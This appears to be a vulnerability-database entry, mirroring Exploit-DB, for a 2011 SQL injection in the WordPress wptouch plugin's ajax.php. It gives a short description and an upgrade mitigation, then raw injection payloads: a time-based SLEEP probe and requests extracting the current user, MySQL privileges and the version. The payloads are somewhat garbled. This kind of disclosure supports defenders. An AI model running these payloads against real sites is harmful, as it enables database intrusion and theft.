header-logo
Suggest Exploit
vendor:
wptouch plugin
by:
longrifle0x
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: wptouch plugin
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Yes
Related CWE: None
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

WordPress wptouch plugin SQL Injection Vulnerability

A SQL Injection vulnerability was discovered in the WordPress wptouch plugin. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request to the ajax.php file. This can allow the attacker to execute arbitrary SQL commands on the underlying database.

Mitigation:

Upgrade to the latest version of the WordPress wptouch plugin.
Source

Exploit-DB raw data:

# Exploit Title: WordPress wptouch plugin SQL Injection Vulnerability
# Date: 2011-27-10
# Author: longrifle0x
# software: Wordpress
# Tools: SQLMAP
---------------
(POST data)
---------------

http://www.site.com/wp-content/plugins/wptouch/ajax.php

#Exploit: id=-1; id=- AND SLEEP(5) or 1=if

http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][CURRENT_USER()

http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][SELECT
(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
0,1)='Y') THEN 1 ELSE 0 END)

http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][MID((VERSION()),1,6)